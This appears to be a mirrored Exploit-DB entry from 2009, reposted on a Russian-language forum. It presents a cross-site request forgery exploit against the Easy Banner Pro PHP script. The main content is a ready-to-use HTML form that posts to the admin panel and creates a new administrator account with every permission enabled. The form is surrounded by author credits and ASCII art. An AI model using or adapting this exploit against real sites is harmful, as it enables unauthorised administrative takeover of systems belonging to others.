- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 10440
- Проверка EDB
-
- Пройдено
- Автор
- BI0
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- null
- Дата публикации
- 2009-12-14
Код:
# Title: Easy Banner Pro - [ CSRF ] Create Administrator Account
# Date: 14/12/2009
# Author: bi0
# Software Link: http://scripts-gate.com/4/easy-banner-pro-banner-exchange-script.html
# CVE : ()
______ __ ______
/\ == \ /\ \ /\ __ \
\ \ __< \ \ \ \ \ \/\ \
\ \_____\ \ \_\ \ \_____\
\/_____/ \/_/ \/_____/
01000010 01101001 01001111
[#]----------------------------------------------------------------[#]
#
# [+] Easy Banner Pro - [ CSRF ] Create Administrator Account
#
# // Author Info
# [x] Author: bi0
# [x] Contact: [email protected]
# [x] Homepage : www.ssteam.ws
# [x] Thanks: sp1r1t,packetdeath,Zer0flag,redking and ssteam.ws ...
#
[#]-------------------------------------------------------------------------------------------[#]
#
# [x] Exploit :
#
# [ CSRF ]
#
# [ Login ]
# http://localhost/[path]/administration/index.php
#
# // Start CSRF
|-------------------------------------------------------------------------------|
<form action="http://localhost/[path]/administration/admins.php" method="POST">
<input type="hidden" name="action" value="admin_created">
<input name="username" value="adminlol" maxlength=15>
<input name="password" maxlength=15 value="adminlol">
<input name="email" maxlength="255" value="[email protected]">
<input name="name" maxlength="255" value="adminlol">
<input type="hidden" name="rights[]" value="advertisers" CHECKED>
<input type="hidden" name="rights[]" value="packages" CHECKED>
<input type="hidden" name="rights[]" value="publishers" CHECKED>
<input type="hidden" name="rights[]" value="ads" CHECKED>
<input type="hidden" name="rights[]" value="def_ads" CHECKED>
<input type="hidden" name="rights[]" value="black_zones" CHECKED>
<input type="hidden" name="rights[]" value="backup" CHECKED>
<input type="hidden" name="rights[]" value="email_u" CHECKED>
<input type="hidden" name="rights[]" value="reset" CHECKED>
<input type="hidden" name="rights[]" value="tmpl_msg" CHECKED>
<input type="hidden" name="rights[]" value="admins" CHECKED>
<input type="hidden" name="rights[]" value="config" CHECKED>
<input type="submit" name="submit" value="Submit">
</form>
|-------------------------------------------------------------------------------|
# // End of attack
#
[#]------------------------------------------------------------------------------------------[#]
- Источник
- www.exploit-db.com